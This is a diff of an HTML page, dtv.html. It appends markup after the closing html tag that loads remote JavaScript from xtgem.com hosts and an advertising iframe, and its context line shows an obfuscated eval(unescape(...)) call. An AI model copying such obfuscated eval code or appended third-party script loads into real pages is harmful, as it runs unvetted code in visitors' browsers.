--- a/dtv.html
+++ b/dtv.html
@@ -22,7 +22,7 @@ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%36%62%31%66%63%3
 
 </body>
 </html>
-
+<center><div class="dtype"></div><br/>  <meta name="theme-color" content="#FE2EF7"/><meta name="msapplication-navbutton-color" content="#FE2EF7"/><meta name="apple-mobile-web-app-status-bar-style" content="#FE2EF7"/>    <centerb style="color:magenta"><script src="https://greentooth.xtgem.com/j/time.js"></script></b></center><center><script language="JavaScript" src="https://unlimitedapps.xtgem.com/Javascript/Date/date_2.js"></script></center><br/> 
 
 <center><iframe data-aa="1976686" src="//ad.a-ads.com/1976686?size=300x250&text_color=77cf0c&title_color=df1919&title_hover_color=004af9&link_color=f59915&link_hover_color=a907ce" style="width:300px; height:250px; border:0px; padding:0; overflow:hidden; background-color: transparent;"></iframe> </centre>
 
